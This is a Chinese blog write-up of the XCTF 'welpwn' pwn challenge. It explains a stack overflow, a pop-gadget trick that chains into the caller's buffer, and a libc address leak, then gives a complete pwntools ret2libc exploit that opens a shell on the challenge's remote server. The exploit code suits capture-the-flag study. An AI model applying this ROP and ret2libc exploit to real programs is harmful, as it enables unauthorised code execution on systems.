[攻防世界 pwn]——welpwn

最新推荐文章于 2023-03-08 20:40:43 发布
最新推荐文章于 2023-03-08 20:40:43 发布
阅读量298 收藏 2
点赞数
分类专栏: # 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113884639
版权

[攻防世界 pwn]——welpwn

我只能说这道题太巧了, 实在太巧了。我想出来一个名词叫做栈连接

还是先checksec一下
在这里插入图片描述
然后在IDA中看看, buf无法溢出, s因为有循环判断限定,只能溢出一个地址。
在这里插入图片描述
在这里插入图片描述

巧就巧在下面
在这里插入图片描述
在这里插入图片描述
0x20 = 32
这样我们就可以输入0x20个字符,也就是四个八个字节,四个pop掉就可以。

aaaaaaaa     <--- s
aaaaaaaa
aaaaaaaa     <--- echo ebp
pop_4_addr   <--- echo ret
aaaaaaaa	 <--- buf
aaaaaaaa
aaaaaaaa
pop_4_addr
pop_rdi_addr
write_got
main_addr

执行后变为, buf的前四个 八个字节都被pop掉了

pop_rdi_addr  <--- ret
write_got
main_addr

同理,将栈这样构造。就可以获得shell了

aaaaaaaa     <--- s
aaaaaaaa
aaaaaaaa     <--- echo ebp
pop_4_addr   <--- echo ret
aaaaaaaa	 <--- buf
aaaaaaaa
aaaaaaaa
pop_4_addr
pop_rdi_addr
bin_sh_addr
system_addr

exploit

from pwn import *
from LibcSearcher import *
#p = process("./pwn")
p = remote("111.200.241.244",49039)
elf = ELF('./pwn') 
#gdb.attach(p, "b *0x0400782") 
write_got = elf.got['write']  
puts_plt = elf.plt['puts']  
pop_4 = 0x40089C  
pop_rdi = 0x4008A3   
p.recvuntil('Welcome to RCTF\n')  
  
main_addr = 0x4007CD  
payload = 'a'*0x18 + p64(pop_4) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr)  
p.send(payload)  
p.recvuntil('\x40')  
write_addr = u64(p.recv(6).ljust(8,'\x00'))  
print hex(write_addr)  
libc = LibcSearcher('write',write_addr)  
libc_base = write_addr - libc.dump('write')  
system_addr = libc_base + libc.dump('system')  
binsh_addr = libc_base + libc.dump('str_bin_sh')  
 
p.recvuntil('\n')  
payload = 'a'*0x18 + p64(pop_4) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)  
  
p.send(payload)  
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 632
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
攻防世界 Pwn welpwn
MrTreebook的博客
12-25 2506
攻防世界 Pwn welpwn1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary 没有PIE 3.IDA分析 main函数中有一个可以输入的地方,但是不能溢出 接着往下看 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到一个特殊的gadget,它就是破题的关键 我们
攻防世界welpwn
weixin_56777139的博客
03-08 198
攻防世界welpwn
[攻防世界]-welpwn
m0_55906008的博客
12-05 564
pwn
攻防世界 welpwn WP
Zarcs_233的博客
01-29 921
这道题出的确实很wel 拿到这题,查看保护 发现shellcode走不通,一般都是走rop路线 IDA打开,分析代码,发现main函数内调用了echo函数 这里的buf有0x400大,但是main不存在栈溢出,继续点开echo 这里我们发现有一个赋值的过程,但是a1也就是buff有0x400,而s2只有0x10字节。 很明显,复制过程中存在栈溢出,但是我一开始没发现这一点,那就是这个赋值的终止...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
welpwn pwn 入门题
02-11
pwn 入门题
awd攻防比赛总结——3s_NwGeek.docx
09-30
首先,作者介绍了比赛的规则和环境,包括多个环境、Web 和 Pwn 等。然后,作者分享了自己的战略和技巧,其中包括挖洞、补洞、溯源分析和可持续访问等。 在比赛中,作者遇到了很多的问题,例如服务器Environment会...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
pwn-welpwn
醉等佳人归
09-08 259
1.题目 1.保护机制 开启nx 2.关键代码 主函数 echo函数 2.思路 重点1:可以看到栈溢出漏洞,但是echo函数代码显然限制了ROP链中有\x00的出现,但是我们发现echo函数栈非常小,导出我们溢出可以溢出到主函数的buf缓冲区中,而且主函数的buf是不受\x00影响的,所以我们先使用pop覆盖echo函数的返回值,然后在主函数的buf中执行shellcode 重点2:这次试用了LibcSearcher库来完成函数地址泄漏 from pwn import * from ctypes imp
welpwn RCTF-2015 攻防世界
qq_41071646的博客
06-03 1637
参考链接 http://www.purpleroc.com/md/2015-11-17@RCTF-Writeup.html 这个题只是没有想到 找到这个点 然后 攻防世界 给的 so库也有问题 感觉 攻防世界的so环境都是 2.23的鸭 然后我就没有用DynELF 其实 可以在服务器看一下 地址 然后根据 后三位来判断是那个 只不过没有 DynELF 方便 思路就是 构造一个 ...
攻防世界高手进阶区 ——Welpwn
weixin_62675330的博客
03-21 854
攻防世界高手进阶区 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
攻防世界-PWN进阶区-welpwn(RCTF-2015)
weixin_44145820的博客
02-27 1039
题目分析 首先看一下开了哪些保护 因为开了NX,所以考虑使用ROP或者return-into-libc 用IDApro分析一下源代码 可以看出main函数中不存在注入点,我们看一下echo函数 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到...
xctf_pwn welpwn writeup
yagamilaido的博客
05-16 376
xctf_pwn3 welpwn 文章目录xctf_pwn3 welpwn程序分析exp思路 程序分析 惯例查信息 程序逻辑简单粗暴,读0x400字节(这里无法溢出)。 然后echo中打印,打印前拷贝到16字节数组中,存在栈溢出 3、考虑x86_64下著名万能ROP,一直没怎么用过这次拿来练练手(捂脸) _libc_csu_init 函数下的 pop&call ​ 注意 0x0000000000400880,可知道 r13、r14、r15 分别对应前三个参数,r12保存调用地址的
ADworld pwn wp - welpwn
fa1c4的blog
06-26 138
输入没有溢出, 但是复制过程出现了溢出点, 0x400复制到0x10中, 所以可以溢出echo函数, 劫持到ROP泄露puts地址, 找到libc版本, 然后ret2libc. 不过尝试之后发现行不通, 因为复制过程遇到截断符’\0’会停止, 所以直接ROP链会复制不完全, pop_rdi_addr本身就包含了’\0’, 所以可以平衡栈后执行ROP, 这里不一定是在复制完返回地址之后马上截断, 但是8字节地址中包含’\0’, 所以一定会截断, 这里覆盖到的地址是buf的前8个字节, 对ROP没影响,...
攻防世界)(pwn)forgot
PLpa的博客
07-21 2357
这题我也是想了好久啊,实在是没找到什么办法,后来还是把题目给摸透了根据经验一个个试出来的方法!!! 拿到题目下载附件查看保护: 只开了NX,嗯。。。 进入IDA,————惊了,这个是啥子意思??? 一大堆奇奇怪怪的东西,实在是看不懂,我们只能看看几个关键的输入点: 第一个输入name: 没有什么东西,进行看string v2 : 我们看到距离32的地方,有个0x54的函数指针: 找...
Pwn-最简单栈溢出(2018铁三云贵赛区)write函数泄露+用地址跳回重执行主函数
publicStr的博客
05-16 4582
开始前的例行叨叨:这大概是最简单的pwn题了吧,直接溢出的。主要是记录下write函数泄露动态地址的姿势,还有程序执行完一次就退出了,如何在溢出的末尾让它重执行,以及从lic中提取地址的姿势。...
攻防世界】Web warmup
DG_s1mple
01-02 820
这一题主要是利用了include的特性如果include的文件名中含有“/”,那么它会识别其为一个带目录的文件,只有最后一个“/”后的字符串对应的文件会被包含,而前面的字符串都只是在指定目录意思是,如果我们的payload是这样的对于include来说,就只会识别"/"后面的内容,变成了解了这个特性之后,我们就可以开始做题了。
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值